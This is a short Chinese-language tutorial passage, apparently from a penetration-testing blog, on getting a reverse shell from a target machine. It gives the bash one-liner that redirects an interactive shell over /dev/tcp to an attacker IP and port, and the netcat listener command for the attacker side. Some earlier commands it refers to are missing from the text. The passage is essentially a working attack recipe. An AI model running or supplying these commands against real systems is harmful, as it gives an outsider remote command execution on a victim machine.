当靶机上有netcat就简单了,先在攻击机上监听一个端口: 再在靶机上把bash反弹给攻击机: 这时在攻击机上就可以看到连接成功,也就可以执行命令了: 但是,很多情况下,目标主机上并没有netcat,这时就可以使用如下方式: 最常用也是最好用的就是如下命令: bash -i > /dev/tcp/192.168.31.4/8080 0>&1 2>&1 2>&1 将标准错误重定向到标准输出中。 上述是在被控者的机器上。 需要在攻击者的机器上监听端口,一般使用如下命令: nc -lpv 8080 #8080表示你监听的端口